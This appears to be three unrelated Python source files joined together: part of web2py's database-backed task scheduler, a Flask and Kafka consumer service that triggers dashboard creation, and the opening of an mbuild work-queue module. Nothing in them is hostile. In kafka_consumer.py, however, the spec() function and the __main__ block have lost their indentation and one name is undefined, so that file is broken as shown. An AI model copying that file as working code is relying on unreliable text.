    Persists state in three tables (scheduler_task, scheduler_run,
    scheduler_worker — see define_tables) and overrides the
    MetaScheduler hooks to pop, execute and report tasks, and to
    heartbeat through the scheduler_worker table. One worker at a time
    is elected "ticker" and is responsible for assigning tasks.
    """
    def __init__(self, db, tasks=None, migrate=True,
                 worker_name=None, group_names=['main'], heartbeat=HEARTBEAT,
                 max_empty_runs=0, discard_results=False, utc_time=False):
        # NOTE(review): group_names uses a mutable default list; callers
        # should not mutate the passed list in place.
        MetaScheduler.__init__(self)
        self.db = db
        self.db_thread = None  # separate DAL built lazily by the heartbeat thread
        self.tasks = tasks
        self.group_names = group_names
        self.heartbeat = heartbeat
        # default worker name: hostname#pid
        self.worker_name = worker_name or socket.gethostname(
        ) + '#' + str(os.getpid())
        #list containing status as recorded in the table plus a boost parameter
        #for hibernation (i.e. when someone stop the worker acting on the worker table)
        self.worker_status = [RUNNING, 1]
        self.max_empty_runs = max_empty_runs
        self.discard_results = discard_results
        self.is_a_ticker = False
        self.do_assign_tasks = False
        self.greedy = False
        self.utc_time = utc_time
        from gluon import current
        current._scheduler = self
        self.define_tables(db, migrate=migrate)

    def now(self):
        """Current datetime, UTC or local depending on utc_time."""
        return self.utc_time and datetime.datetime.utcnow() or datetime.datetime.now()

    def set_requirements(self, scheduler_task):
        """on_define hook: default application_name from the current request."""
        from gluon import current
        if hasattr(current, 'request'):
            scheduler_task.application_name.default = '%s/%s' % (
                current.request.application, current.request.controller
            )

    def define_tables(self, db, migrate):
        """Define the three scheduler tables on *db*."""
        from gluon.dal import DEFAULT
        logger.debug('defining tables (migrate=%s)', migrate)
        now = self.now
        db.define_table(
            'scheduler_task',
            Field('application_name', requires=IS_NOT_EMPTY(),
                  default=None, writable=False),
            Field('task_name', default=None),
            Field('group_name', default='main'),
            Field('status', requires=IS_IN_SET(TASK_STATUS),
                  default=QUEUED, writable=False),
            Field('function_name',
                  requires=IS_IN_SET(sorted(self.tasks.keys()))
                  if self.tasks else DEFAULT),
            Field('uuid', requires=IS_NOT_IN_DB(db, 'scheduler_task.uuid'),
                  unique=True, default=web2py_uuid),
            Field('args', 'text', default='[]', requires=TYPE(list)),
            Field('vars', 'text', default='{}', requires=TYPE(dict)),
            Field('enabled', 'boolean', default=True),
            Field('start_time', 'datetime', default=now,
                  requires=IS_DATETIME()),
            Field('next_run_time', 'datetime', default=now),
            Field('stop_time', 'datetime'),
            Field('repeats', 'integer', default=1, comment="0=unlimited",
                  requires=IS_INT_IN_RANGE(0, None)),
            Field('retry_failed', 'integer', default=0, comment="-1=unlimited",
                  requires=IS_INT_IN_RANGE(-1, None)),
            Field('period', 'integer', default=60, comment='seconds',
                  requires=IS_INT_IN_RANGE(0, None)),
            Field('timeout', 'integer', default=60, comment='seconds',
                  requires=IS_INT_IN_RANGE(0, None)),
            Field('sync_output', 'integer', default=0,
                  comment="update output every n sec: 0=never",
                  requires=IS_INT_IN_RANGE(0, None)),
            Field('times_run', 'integer', default=0, writable=False),
            Field('times_failed', 'integer', default=0, writable=False),
            Field('last_run_time', 'datetime', writable=False, readable=False),
            Field('assigned_worker_name', default='', writable=False),
            on_define=self.set_requirements,
            migrate=migrate, format='%(task_name)s')
        db.define_table(
            'scheduler_run',
            Field('scheduler_task', 'reference scheduler_task'),
            Field('status', requires=IS_IN_SET(RUN_STATUS)),
            Field('start_time', 'datetime'),
            Field('stop_time', 'datetime'),
            Field('output', 'text'),
            Field('result', 'text'),
            Field('traceback', 'text'),
            Field('worker_name', default=self.worker_name),
            migrate=migrate)
        db.define_table(
            'scheduler_worker',
            Field('worker_name', unique=True),
            Field('first_heartbeat', 'datetime'),
            Field('last_heartbeat', 'datetime'),
            Field('status', requires=IS_IN_SET(WORKER_STATUS)),
            Field('is_ticker', 'boolean', default=False, writable=False),
            Field('group_names', 'list:string', default=self.group_names),
            migrate=migrate)
        if migrate:
            db.commit()

    def loop(self, worker_name=None):
        """Main worker loop (db-aware version of MetaScheduler.loop):
        honours the DISABLED worker status and exits cleanly on
        SIGTERM / KeyboardInterrupt / SystemExit."""
        signal.signal(signal.SIGTERM, lambda signum, stack_frame: sys.exit(1))
        try:
            self.start_heartbeats()
            while True and self.have_heartbeat:
                if self.worker_status[0] == DISABLED:
                    logger.debug('Someone stopped me, sleeping until better times come (%s)', self.worker_status[1])
                    self.sleep()
                    continue
                logger.debug('looping...')
                task = self.pop_task()
                if task:
                    self.empty_runs = 0
                    self.worker_status[0] = RUNNING
                    self.report_task(task, self.async(task))
                    self.worker_status[0] = ACTIVE
                else:
                    self.empty_runs += 1
                    logger.debug('sleeping...')
                    if self.max_empty_runs != 0:
                        logger.debug('empty runs %s/%s',
                                     self.empty_runs, self.max_empty_runs)
                        if self.empty_runs >= self.max_empty_runs:
                            logger.info(
                                'empty runs limit reached, killing myself')
                            self.die()
                    self.sleep()
        except (KeyboardInterrupt, SystemExit):
            logger.info('catched')
            self.die()

    def wrapped_assign_tasks(self, db):
        """Ticker-only: retry assign_tasks up to 10 times, rolling back
        on any db error (e.g. lock contention)."""
        db.commit()  # ?don't know if it's useful, let's be completely sure
        x = 0
        while x < 10:
            try:
                self.assign_tasks(db)
                db.commit()
                break
            except:
                db.rollback()
                logger.error('TICKER(%s): error assigning tasks', self.worker_name)
                x += 1
                time.sleep(0.5)

    def pop_task(self):
        """Grab the next task assigned to this worker (or, if ticker,
        possibly reassign tasks instead) and return it as a Task, or
        None when there is nothing to do."""
        now = self.now()
        db, st = self.db, self.db.scheduler_task
        if self.is_a_ticker and self.do_assign_tasks:
            #I'm a ticker, and 5 loops passed without reassigning tasks, let's do
            #that and loop again
            self.wrapped_assign_tasks(db)
            return None
        #ready to process something
        grabbed = db(st.assigned_worker_name == self.worker_name)(
            st.status == ASSIGNED)
        task = grabbed.select(limitby=(0, 1), orderby=st.next_run_time).first()
        if task:
            task.update_record(status=RUNNING, last_run_time=now)
            #noone will touch my task!
            db.commit()
            logger.debug(' work to do %s', task.id)
        else:
            if self.greedy and self.is_a_ticker:
                #there are other tasks ready to be assigned
                logger.info('TICKER (%s): greedy loop', self.worker_name)
                self.wrapped_assign_tasks(db)
            else:
                logger.info('nothing to do')
            return None
        next_run_time = task.last_run_time + datetime.timedelta(
            seconds=task.period)
        times_run = task.times_run + 1
        if times_run < task.repeats or task.repeats == 0:
            #need to run (repeating task)
            run_again = True
        else:
            #no need to run again
            run_again = False
        run_id = 0
        # create the scheduler_run record (skipped when discard_results);
        # retried until the insert commits
        while True and not self.discard_results:
            logger.debug(' new scheduler_run record')
            try:
                run_id = db.scheduler_run.insert(
                    scheduler_task=task.id,
                    status=RUNNING,
                    start_time=now,
                    worker_name=self.worker_name)
                db.commit()
                break
            except:
                time.sleep(0.5)
                db.rollback()
        logger.info('new task %(id)s "%(task_name)s" %(application_name)s.%(function_name)s' % task)
        return Task(
            app=task.application_name,
            function=task.function_name,
            timeout=task.timeout,
            args=task.args,  # in json
            vars=task.vars,  # in json
            task_id=task.id,
            run_id=run_id,
            run_again=run_again,
            next_run_time=next_run_time,
            times_run=times_run,
            stop_time=task.stop_time,
            retry_failed=task.retry_failed,
            times_failed=task.times_failed,
            sync_output=task.sync_output)

    def report_task(self, task, task_report):
        """Persist a TaskReport: update/delete the scheduler_run record
        and move the scheduler_task to its next status (QUEUED again,
        COMPLETED, EXPIRED, FAILED or TIMEOUT). Retries until commit."""
        db = self.db
        now = self.now()
        while True:
            try:
                if not self.discard_results:
                    if task_report.result != 'null' or task_report.tb:
                        #result is 'null' as a string if task completed
                        #if it's stopped it's None as NoneType, so we record
                        #the STOPPED "run" anyway
                        logger.debug(' recording task report in db (%s)',
                                     task_report.status)
                        db(db.scheduler_run.id == task.run_id).update(
                            status=task_report.status,
                            stop_time=now,
                            result=task_report.result,
                            output=task_report.output,
                            traceback=task_report.tb)
                    else:
                        logger.debug(' deleting task report in db because of no result')
                        db(db.scheduler_run.id == task.run_id).delete()
                #if there is a stop_time and the following run would exceed it
                is_expired = (task.stop_time
                              and task.next_run_time > task.stop_time
                              and True or False)
                # and/or ternary: EXPIRED if repeating past stop_time,
                # QUEUED if repeating, else COMPLETED
                status = (task.run_again and is_expired and EXPIRED
                          or task.run_again and not is_expired
                          and QUEUED or COMPLETED)
                if task_report.status == COMPLETED:
                    d = dict(status=status,
                             next_run_time=task.next_run_time,
                             times_run=task.times_run,
                             times_failed=0
                             )
                    db(db.scheduler_task.id == task.task_id)(
                        db.scheduler_task.status == RUNNING).update(**d)
                else:
                    # STOPPED runs are requeued; FAILED/TIMEOUT stay as-is
                    # unless retry_failed still allows another attempt
                    st_mapping = {'FAILED': 'FAILED',
                                  'TIMEOUT': 'TIMEOUT',
                                  'STOPPED': 'QUEUED'}[task_report.status]
                    status = (task.retry_failed
                              and task.times_failed < task.retry_failed
                              and QUEUED or task.retry_failed == -1
                              and QUEUED or st_mapping)
                    db(
                        (db.scheduler_task.id == task.task_id) &
                        (db.scheduler_task.status == RUNNING)
                    ).update(
                        times_failed=db.scheduler_task.times_failed + 1,
                        next_run_time=task.next_run_time,
                        status=status
                    )
                db.commit()
                logger.info('task completed (%s)', task_report.status)
                break
            except:
                db.rollback()
                time.sleep(0.5)

    def adj_hibernation(self):
        """While DISABLED, grow the sleep multiplier up to MAXHIBERNATION."""
        if self.worker_status[0] == DISABLED:
            wk_st = self.worker_status[1]
            hibernation = wk_st + 1 if wk_st < MAXHIBERNATION else MAXHIBERNATION
            self.worker_status[1] = hibernation

    def send_heartbeat(self, counter):
        """Heartbeat loop body (runs in its own thread with its own DAL):
        record this worker's liveness, obey DISABLED/TERMINATE/KILL
        statuses, and every 5th beat clean up dead workers and elect the
        ticker."""
        if not self.db_thread:
            logger.debug('thread building own DAL object')
            self.db_thread = DAL(
                self.db._uri, folder=self.db._adapter.folder)
            self.define_tables(self.db_thread, migrate=False)
        try:
            db = self.db_thread
            sw, st = db.scheduler_worker, db.scheduler_task
            now = self.now()
            # record heartbeat
            mybackedstatus = db(
                sw.worker_name == self.worker_name).select().first()
            if not mybackedstatus:
                sw.insert(status=ACTIVE, worker_name=self.worker_name,
                          first_heartbeat=now, last_heartbeat=now,
                          group_names=self.group_names)
                self.worker_status = [ACTIVE, 1]  # activating the process
            else:
                if mybackedstatus.status == DISABLED:
                    # keep sleeping
                    self.worker_status[0] = DISABLED
                    if self.worker_status[1] == MAXHIBERNATION:
                        logger.debug('........recording heartbeat')
                        db(sw.worker_name == self.worker_name).update(
                            last_heartbeat=now)
                elif mybackedstatus.status == TERMINATE:
                    self.worker_status[0] = TERMINATE
                    logger.debug("Waiting to terminate the current task")
                    self.give_up()
                    return
                elif mybackedstatus.status == KILL:
                    self.worker_status[0] = KILL
                    self.die()
                else:
                    logger.debug('........recording heartbeat (%s)', self.worker_status[0])
                    db(sw.worker_name == self.worker_name).update(
                        last_heartbeat=now, status=ACTIVE)
                    self.worker_status[1] = 1  # re-activating the process
                    if self.worker_status[0] <> RUNNING:
                        self.worker_status[0] = ACTIVE
            self.do_assign_tasks = False
            if counter % 5 == 0:
                try:
                    # delete inactive workers
                    expiration = now - datetime.timedelta(seconds=self.heartbeat * 3)
                    departure = now - datetime.timedelta(
                        seconds=self.heartbeat * 3 * MAXHIBERNATION)
                    logger.debug(
                        '    freeing workers that have not sent heartbeat')
                    inactive_workers = db(
                        ((sw.last_heartbeat < expiration) & (sw.status == ACTIVE)) |
                        ((sw.last_heartbeat <
                          departure) & (sw.status != ACTIVE))
                    )
                    # requeue tasks held by dead workers
                    db(st.assigned_worker_name.belongs(
                        inactive_workers._select(sw.worker_name)))(st.status == RUNNING)\
                        .update(assigned_worker_name='', status=QUEUED)
                    inactive_workers.delete()
                    self.is_a_ticker = self.being_a_ticker()
                    if self.worker_status[0] == ACTIVE:
                        self.do_assign_tasks = True
                except:
                    pass
            db.commit()
        except:
            db.rollback()
        self.adj_hibernation()
        self.sleep()

    def being_a_ticker(self):
        """Elect a ticker: if none exists, claim the role (only when not
        busy or when we are the only worker). Returns True if this
        worker is the ticker."""
        db = self.db_thread
        sw = db.scheduler_worker
        all_active = db(
            (sw.worker_name != self.worker_name) & (sw.status == ACTIVE)
        ).select()
        ticker = all_active.find(lambda row: row.is_ticker is True).first()
        not_busy = self.worker_status[0] == ACTIVE
        if not ticker:
            if not_busy:
                #only if this worker isn't busy, otherwise wait for a free one
                db(sw.worker_name == self.worker_name).update(is_ticker=True)
                db(sw.worker_name != self.worker_name).update(is_ticker=False)
                logger.info("TICKER(%s): I'm a ticker", self.worker_name)
            else:
                #giving up, only if I'm not alone
                if len(all_active) > 1:
                    db(sw.worker_name == self.worker_name).update(is_ticker=False)
                else:
                    not_busy = True
            db.commit()
            return not_busy
        else:
            logger.info(
                "%s is a ticker, I'm a poor worker" % ticker.worker_name)
            return False

    def assign_tasks(self, db):
        """Ticker-only: distribute runnable tasks evenly among the
        active workers of each group, capping the batch per cycle."""
        sw, st = db.scheduler_worker, db.scheduler_task
        now = self.now()
        all_workers = db(sw.status == ACTIVE).select()
        #build workers as dict of groups
        wkgroups = {}
        for w in all_workers:
            group_names = w.group_names
            for gname in group_names:
                if gname not in wkgroups:
                    wkgroups[gname] = dict(
                        workers=[{'name': w.worker_name, 'c': 0}])
                else:
                    wkgroups[gname]['workers'].append(
                        {'name': w.worker_name, 'c': 0})
        #set queued tasks that expired between "runs" (i.e., you turned off
        #the scheduler): then it wasn't expired, but now it is
        db(st.status.belongs(
            (QUEUED, ASSIGNED)))(st.stop_time < now).update(status=EXPIRED)
        all_available = db(
            (st.status.belongs((QUEUED, ASSIGNED))) &
            ((st.times_run < st.repeats) | (st.repeats == 0)) &
            (st.start_time <= now) &
            ((st.stop_time == None) | (st.stop_time > now)) &
            (st.next_run_time <= now) &
            (st.enabled == True)
        )
        limit = len(all_workers) * (50 / (len(wkgroups) or 1))
        #if there are a moltitude of tasks, let's figure out a maximum of tasks per worker.
        #this can be adjusted with some added intelligence (like esteeming how many tasks will
        #a worker complete before the ticker reassign them around, but the gain is quite small
        #50 is quite a sweet spot also for fast tasks, with sane heartbeat values
        #NB: ticker reassign tasks every 5 cycles, so if a worker completes his 50 tasks in less
        #than heartbeat*5 seconds, it won't pick new tasks until heartbeat*5 seconds pass.
        #If a worker is currently elaborating a long task, all other tasks assigned
        #to him needs to be reassigned "freely" to other workers, that may be free.
        #this shuffles up things a bit, in order to maintain the idea of a semi-linear scalability
        #let's freeze it up
        db.commit()
        x = 0
        for group in wkgroups.keys():
            tasks = all_available(st.group_name == group).select(
                limitby=(0, limit), orderby = st.next_run_time)
            #let's break up the queue evenly among workers
            for task in tasks:
                x += 1
                gname = task.group_name
                ws = wkgroups.get(gname)
                if ws:
                    # pick the least-loaded worker seen so far in this group
                    counter = 0
                    myw = 0
                    for i, w in enumerate(ws['workers']):
                        if w['c'] < counter:
                            myw = i
                        counter = w['c']
                    d = dict(
                        status=ASSIGNED,
                        assigned_worker_name=wkgroups[gname]['workers'][myw]['name']
                    )
                    if not task.task_name:
                        d['task_name'] = task.function_name
                    task.update_record(**d)
                    wkgroups[gname]['workers'][myw]['c'] += 1
        db.commit()
        #I didn't report tasks but I'm working nonetheless!!!!
        if x > 0:
            self.empty_runs = 0
        #I'll be greedy only if tasks assigned are equal to the limit
        # (meaning there could be others ready to be assigned)
        self.greedy = x >= limit and True or False
        logger.info('TICKER(%s): workers are %s', self.worker_name, len(all_workers))
        logger.info('TICKER(%s): tasks are %s', self.worker_name, x)

    def sleep(self):
        # hibernation multiplier (worker_status[1]) stretches the sleep
        # while the worker is DISABLED
        time.sleep(self.heartbeat * self.worker_status[1])
        # should only sleep until next available task

    def queue_task(self, function, pargs=[], pvars={}, **kwargs):
        """
        Queue tasks. This takes care of handling the validation of all
        values.
        :param function: the function (anything callable with a __name__)
        :param pargs: "raw" args to be passed to the function. Automatically
            jsonified.
        :param pvars: "raw" kwargs to be passed to the function. Automatically
            jsonified
        :param kwargs: all the scheduler_task columns. args and vars here should be
            in json format already, they will override pargs and pvars
        returns a dict just as a normal validate_and_insert, plus a uuid key holding
        the uuid of the queued task. If validation is not passed, both id and uuid
        will be None, and you'll get an "error" dict holding the errors found.

        NOTE(review): pargs/pvars use mutable default arguments; they are
        only read here, so this is harmless, but do not mutate them.
        """
        if hasattr(function, '__name__'):
            function = function.__name__
        targs = 'args' in kwargs and kwargs.pop('args') or dumps(pargs)
        tvars = 'vars' in kwargs and kwargs.pop('vars') or dumps(pvars)
        tuuid = 'uuid' in kwargs and kwargs.pop('uuid') or web2py_uuid()
        tname = 'task_name' in kwargs and kwargs.pop('task_name') or function
        rtn = self.db.scheduler_task.validate_and_insert(
            function_name=function,
            task_name=tname,
            args=targs,
            vars=tvars,
            uuid=tuuid,
            **kwargs)
        if not rtn.errors:
            rtn.uuid = tuuid
        else:
            rtn.uuid = None
        return rtn

    def task_status(self, ref, output=False):
        """
        Shortcut for task status retrieval
        :param ref: can be
            - integer --> lookup will be done by scheduler_task.id
            - string --> lookup will be done by scheduler_task.uuid
            - query --> lookup as you wish (as in db.scheduler_task.task_name == 'test1')
        :param output: fetch also the scheduler_run record
        Returns a single Row object, for the last queued task
        If output == True, returns also the last scheduler_run record
            scheduler_run record is fetched by a left join, so it can
            have all fields == None
        """
        from gluon.dal import Query
        sr, st = self.db.scheduler_run, self.db.scheduler_task
        if isinstance(ref, int):
            q = st.id == ref
        elif isinstance(ref, str):
            q = st.uuid == ref
        elif isinstance(ref, Query):
            q = ref
        else:
            raise SyntaxError(
                "You can retrieve results only by id, uuid or Query")
        fields = st.ALL
        left = False
        orderby = ~st.id
        if output:
            fields = st.ALL, sr.ALL
            left = sr.on(sr.scheduler_task == st.id)
            orderby = ~st.id | ~sr.id
        row = self.db(q).select(
            *fields,
            **dict(orderby=orderby,
                   left=left,
                   limitby=(0, 1))
        ).first()
        if output:
            # decode the json result for convenience (None if no run yet)
            row.result = row.scheduler_run.result and \
                loads(row.scheduler_run.result,
                      object_hook=_decode_dict) or None
        return row
def main():
    """
    allows to run worker without python web2py.py .... by simply python this.py

    Parses command-line options, builds a DAL connection, instantiates a
    Scheduler and enters its worker loop until killed.
    """
    parser = optparse.OptionParser()
    parser.add_option(
        "-w", "--worker_name", dest="worker_name", default=None,
        help="start a worker with name")
    parser.add_option(
        "-b", "--heartbeat", dest="heartbeat", default=10,
        type='int', help="heartbeat time in seconds (default 10)")
    parser.add_option(
        "-L", "--logger_level", dest="logger_level",
        default=30,
        type='int',
        help="set debug output level (0-100, 0 means all, 100 means none;default is 30)")
    parser.add_option("-E", "--empty-runs",
                      dest="max_empty_runs",
                      type='int',
                      default=0,
                      help="max loops with no grabbed tasks permitted (0 for never check)")
    parser.add_option(
        "-g", "--group_names", dest="group_names",
        default='main',
        help="comma separated list of groups to be picked by the worker")
    parser.add_option(
        "-f", "--db_folder", dest="db_folder",
        default='/Users/mdipierro/web2py/applications/scheduler/databases',
        help="location of the dal database folder")
    parser.add_option(
        "-u", "--db_uri", dest="db_uri",
        default='sqlite://storage.sqlite',
        help="database URI string (web2py DAL syntax)")
    parser.add_option(
        "-t", "--tasks", dest="tasks", default=None,
        help="file containing task files, must define" +
        "tasks = {'task_name':(lambda: 'output')} or similar set of tasks")
    parser.add_option(
        "-U", "--utc-time", dest="utc_time", default=False,
        help="work with UTC timestamps"
    )
    (options, args) = parser.parse_args()
    if not options.tasks or not options.db_uri:
        # USAGE is presumably defined at module level (not visible in this
        # chunk) — TODO confirm; prints the usage help text
        print USAGE
    if options.tasks:
        # import the tasks dict from the given python file
        path, filename = os.path.split(options.tasks)
        if filename.endswith('.py'):
            filename = filename[:-3]
        sys.path.append(path)
        print 'importing tasks...'
        tasks = __import__(filename, globals(), locals(), [], -1).tasks
        print 'tasks found: ' + ', '.join(tasks.keys())
    else:
        tasks = {}
    group_names = [x.strip() for x in options.group_names.split(',')]
    logging.getLogger().setLevel(options.logger_level)
    print 'groups for this worker: ' + ', '.join(group_names)
    # NOTE(review): '+' binds tighter than 'or', so the "'./'" fallback on
    # the next line can never apply; left unchanged here
    print 'connecting to database in folder: ' + options.db_folder or './'
    print 'using URI: ' + options.db_uri
    db = DAL(options.db_uri, folder=options.db_folder)
    print 'instantiating scheduler...'
    scheduler = Scheduler(db=db,
                          worker_name=options.worker_name,
                          tasks=tasks,
                          migrate=True,
                          group_names=group_names,
                          heartbeat=options.heartbeat,
                          max_empty_runs=options.max_empty_runs,
                          utc_time=options.utc_time)
    # exit cleanly on SIGTERM (e.g. from upstart/init scripts)
    signal.signal(signal.SIGTERM, lambda signum, stack_frame: sys.exit(1))
    print 'starting main worker loop...'
    scheduler.loop()
# Script entry point: run a standalone scheduler worker.
if __name__ == '__main__':
    main()
|
kafka_consumer.py | import requests
import argparse
import logging
import coloredlogs
import threading
from flask import Flask, request, jsonify
from flask_swagger import swagger
from waitress import serve
import subprocess
import json
from kafka import KafkaConsumer
from threading import Thread
import time
app = Flask(__name__)
logger = logging.getLogger("KafkaConsumer")
@app.route('/', methods=['GET'])
def server_status():
    """Liveness probe: always answers an empty 200 response."""
    logger.info("GET /")
    body, status = '', 200
    return body, status
@app.route("/spec", methods=['GET'])
def spec():
swag = swagger(app)
swag['info']['version'] = "1.0"
swag['info']['title'] = "KafkaConsumer REST API"
return jsonify(swag)
def kafka_consumer_refresh_dashboard_handler(topic, value):
    """Block until the first message appears on *topic*, then trigger the
    dashboard creation by POSTing *value* to the DCS dashboard endpoint.

    Runs in a background thread (see the /kafka_consumer endpoint);
    relies on the module globals kafka_ip_port and url_dcs_dashboard.
    """
    logger.info("Creating Kafka Consumer for %s topic", topic)
    consumer = KafkaConsumer(
        topic,
        bootstrap_servers=[kafka_ip_port],
        auto_offset_reset='earliest',
        enable_auto_commit=True,
        group_id=None,
        value_deserializer=lambda x: json.loads(x.decode('utf-8')))
    got_first_message = False
    while not got_first_message:
        polled = consumer.poll(timeout_ms=1000)
        if polled != {}:
            logger.info("Message received in %s topic: %s", topic, polled)
            got_first_message = True
        time.sleep(5)
    logger.info("Creating dashboard for topic: %s", topic)
    response = requests.post(url_dcs_dashboard, json=json.loads(json.dumps({'records': [{'value': value}]})))
    logger.info("Response: Code %s", response)
    # An explicit dashboard refresh (refresh_dashboard.sh) is not needed:
    # the dashboard is generated as soon as data is present.
    logger.info("Closing Kafka Consumer for %s topic", topic)
    consumer.close()
@app.route('/kafka_consumer', methods=['POST'])
def kafka_consumer():
    """Accept a JSON payload describing a topic and spawn a background
    consumer that waits for the first message before creating the
    dashboard. Returns 201 on success, 400 on malformed input."""
    logger.info("Request received - POST /kafka_consumer")
    if not request.is_json:
        logger.warning("Format not valid")
        return 'Format not valid', 400
    try:
        payload = request.get_json()
        value = payload["value"]
        topic = value["topic"]
        # Create Kafka consumer to wait for the first message received in
        # the topic and, then, refresh the dashboard.
        worker = threading.Thread(
            target=kafka_consumer_refresh_dashboard_handler,
            args=[topic, value])
        worker.start()
    except Exception as e:
        logger.error("Error while parsing request")
        logger.exception(e)
        return str(e), 400
    return '', 201
if __name__ == "__main__":
# Usage: /usr/bin/python3 kafka_consumer.py --dcs_dashboard_ip_port localhost:8080 --kafka_ip_port localhost:9092 --log info
parser = argparse.ArgumentParser()
parser.add_argument(
"--dcs_dashboard_ip_port",
help='DCS Dashboard IP:port',
default='localhost:8080')
parser.add_argument(
"--kafka_ip_port",
help='Kafka IP:port',
default='localhost:9092')
parser.add_argument(
"--log",
help='Sets the Log Level output, default level is "info"',
choices=[
"info",
"debug",
"error",
"warning"],
nargs='?',
default='info')
args = parser.parse_args()
numeric_level = getattr(logging, str(args.log).upper(), None)
if not isinstance(numeric_level, int):
raise ValueError('Invalid log level: %s' % loglevel)
coloredlogs.install(
fmt='%(asctime)s %(levelname)s %(message)s',
datefmt='%d/%m/%Y %H:%M:%S',
level=numeric_level)
logging.getLogger("KafkaConsumer").setLevel(numeric_level)
logging.getLogger("requests.packages.urllib3").setLevel(logging.ERROR)
global dcs_dashboard_ip_port
dcs_dashboard_ip_port = str(args.dcs_dashboard_ip_port)
global url_dcs_dashboard
url_dcs_dashboard = "http://" + dcs_dashboard_ip_port + "/portal/dcs/dashboard"
global kafka_ip_port
kafka_ip_port= str(args.kafka_ip_port)
logger.info("Serving KafkaConsumer on port 8291")
serve(app, host='0.0.0.0', port=8291)
|
work_queue.py | # -*- python -*-
# Mark Charney
#BEGIN_LEGAL
#
#Copyright (c) 2017x Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#END_LEGAL
"""Command objects and parallel work queue"""
from __future__ import print_function
import os
import sys
import types
is_py2 = sys.version[0] == '2'
if is_py2:
import Queue as queue
else:
import queue as queue
from threading import Thread
from collections import deque
from .base import *
from .util import *
from .dag import *
############################################################################
class dir_cmd_t(object):
    """For holding a directory and a command. When you call
    execute(), it changes to the directory and executes the command."""

    def __init__(self, dir, command, output_file=None):
        # dir: directory to run in; command: shell command string;
        # output_file: optional file to capture stdout/stderr
        self.dir = dir
        self.command = command
        self.output_file = output_file

    def __str__(self):
        return "DIR: %s\nCOMMAND: %s" % (self.dir, self.command)

    def execute(self, args=None, env=None):
        """Change to the specified directory and execute the command,
        unbufferred.

        @return: (retcode, combined-output-lines); retcode is -1 when
        the directory cannot be entered.
        """
        orig = os.getcwd()
        try:
            msgb("CHDIR TO", self.dir)
            os.chdir(self.dir)
        except OSError:  # narrowed from bare except: only chdir failures
            return (-1, ["no such dir: " + self.dir])
        try:
            msgb("EXECUTING", self.command)
            if self.output_file:
                (retcode, out, err) = \
                    run_command_output_file(self.command, self.output_file)
                msgb("WROTE", self.output_file)
            else:
                (retcode, out, err) = run_command_unbufferred(self.command)
        finally:
            # BUG FIX: restore the original cwd even if the command
            # raises; previously an exception here leaked the chdir.
            os.chdir(orig)
        if not err:
            err = []
        if not out:
            out = []
        if err:
            return (retcode, out + err)
        else:
            return (retcode, out)
class command_t(object):
    """The primary data structure used to track jobs in this script. It
    is created when you add L{plan_t} objects to the DAG
    L{dag_t}."""

    # class-wide counter used to hand each command a unique id
    _ids = 0

    def __init__(self,
                 command=None,
                 args=None,
                 xenv=None,
                 unbufferred=False,
                 output_file_name=None,
                 shell_executable=None,
                 directory=None,
                 name=None,
                 show_output=True,
                 osenv=None,
                 seconds=0,
                 input_file_name=None):
        """
        This is the unit of work for the L{work_queue_t}. These are
        typically created by the L{dag_t} but they can also be created
        by hand and added to the L{work_queue_t} to execute arbitrary
        commands.

        @type command: string or python function, or a list of both
        @param command: command line string to execute or a python function
        @type args: anything
        @param args: (optional) typically a list of arguments for the python function.
        @type xenv: L{env_t}
        @param xenv: (optional) environment for used by the python
        function. Passed as the second argument to the python function.
        @type osenv: dictionary
        @param osenv: (optional) the environment that will be set in the new subprocess.
        @type unbufferred: L{bool}
        @param unbufferred: (optional) true if the output should be unbufferred.
        @type output_file_name: string
        @param output_file_name: (optional) file name for stderr/stdout
        @type show_output: L{bool}
        @param show_output: (optional) show output, default True
        @type input_file_name: string
        @param input_file_name: (optional) file name for stdin
        """
        self.id = command_t._ids
        command_t._ids += 1
        # store the command as a list
        if isinstance(command, list):
            self.command = command
        else:
            self.command = [command]
        self.name = name
        self.shell_executable = shell_executable
        self.args = args
        self.xenv = xenv
        self.osenv = osenv
        self.exit_status = 0
        self.output = []
        self.stderr = []
        self.unbufferred = unbufferred
        # (the original assigned input_file_name twice; once is enough)
        self.input_file_name = input_file_name
        self.output_file_name = output_file_name
        self.start_time = 0
        self.end_time = 0
        self.directory = directory
        self.show_output = show_output
        # Has this command been submitted to the work queue?
        self.submitted = False
        # executed is set to True when this command tries to execute.
        self.executed = False
        # all prerequisite commands are ready
        self.ready = False
        # completed is set to True when this command exits successfully.
        self.completed = False
        # things that depend on this command completing successfully
        self.after_me = []
        # things that must complete before this command can run
        self.before_me = []
        # from the file DAG. A list of inputs upon which this command depends
        self.inputs = []
        # from the file DAG. A list of things generated by this command
        self.targets = []
        # used for special signals to the worker threads to tell them to
        # shut down.
        self.terminator = False
        self.timeout = seconds

    def failed(self):
        """
        Return the exit status.
        @rtype: bool
        @return: True if the command failed (exit status != 0)
        """
        return self.exit_status != 0

    def _complete(self):
        # mark this command as having finished successfully
        self.completed = True

    def _ready(self):
        """Return true if all things that must execute before this node
        have completed and false otherwise. Updates self.ready."""
        if self.ready:
            return True
        for n in self.before_me:
            if not n.completed:
                return False
        self.ready = True
        return True

    def is_python_command(self, i=0):
        """Return true if the command list element is a python function
        @rtype: bool
        """
        return isinstance(self.command[i], types.FunctionType)

    def is_dir_cmd(self, i=0):
        """Return true if the command list element is a python dir_cmd_t object
        @rtype: bool
        """
        return isinstance(self.command[i], dir_cmd_t)

    def has_python_subcommand(self):
        """Return true if the command list has a python function
        @rtype: bool
        """
        for c in self.command:
            if isinstance(c, types.FunctionType):
                return True
        return False

    def is_command_line(self, i=0):
        """Return true if the command list element is normal string command
        line.
        @rtype: bool
        """
        return (not isinstance(self.command[i], types.FunctionType) and
                not isinstance(self.command[i], dir_cmd_t))

    def dagkey(self):
        """Stable key for this command's non-function parts, used by the DAG."""
        s = []
        for i in self.command:
            if not isinstance(i, types.FunctionType):
                s.append(i)
        t = "MBUILD_COMMAND_KEY " + (" - ".join(s))
        return t

    def hash(self):
        """Hash of the non-function parts of the command list."""
        s = []
        for i in self.command:
            if not isinstance(i, types.FunctionType):
                s.append(i)
        t = " - ".join(s)
        h = hash_string(t.encode('utf-8'))
        return h

    def add_before_me(self, n):
